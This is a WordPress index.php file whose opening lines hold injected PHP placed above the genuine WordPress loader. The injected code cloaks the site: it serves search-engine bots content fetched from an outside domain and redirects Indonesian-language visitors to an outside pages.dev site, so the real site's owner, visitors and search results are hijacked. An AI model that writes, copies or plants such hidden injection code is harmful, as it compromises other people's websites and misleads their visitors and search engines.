<?php

$s_ref = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
if (strpos($agent, 'bot') !== false && $_SERVER['REQUEST_URI'] == '/') {
$accept_lang = strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']);
if (strpos($accept_lang, 'zh') !== false && $_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS'] == 1 && $_COOKIE['az'] == 'lp') {
setcookie('az', 'lp', time() + 3600 * 7200);
echo ' '; // Your bot-specific content
exit;
}
echo file_get_contents("https://slebew.xyz/landing/publishing/");
exit;
?>
<?php
}
$browserLang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
if ($browserLang == 'id') {
header("Location: https://jangansukamaling.pages.dev/");
exit;
}
?>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
